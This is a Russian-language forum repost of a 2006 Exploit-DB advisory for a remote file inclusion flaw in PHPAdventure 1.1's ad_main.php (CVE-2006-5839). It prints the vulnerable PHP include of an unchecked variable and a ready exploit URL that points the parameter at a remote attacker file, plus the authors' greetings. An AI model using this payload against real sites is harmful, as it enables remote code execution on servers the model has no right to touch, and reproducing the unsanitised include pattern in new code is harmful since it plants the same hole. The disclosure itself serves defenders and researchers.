Exploit PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2736
Проверка EDB
  1. Пройдено
Автор
HER0
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5839
Дата публикации
2006-11-07
Код:
*********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
contac:[email protected]
nota: all the versions of PHPAdventure is affected..
********************************************
line of the code:

<?php
$_stage = 1;
include($_mygamefile);
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
www.domteam.info

greetz:Sponge Bob,Bob esponja XDDDD...
******************************************************************************************

# milw0rm.com [2006-11-07]
 
Источник
www.exploit-db.com

Похожие темы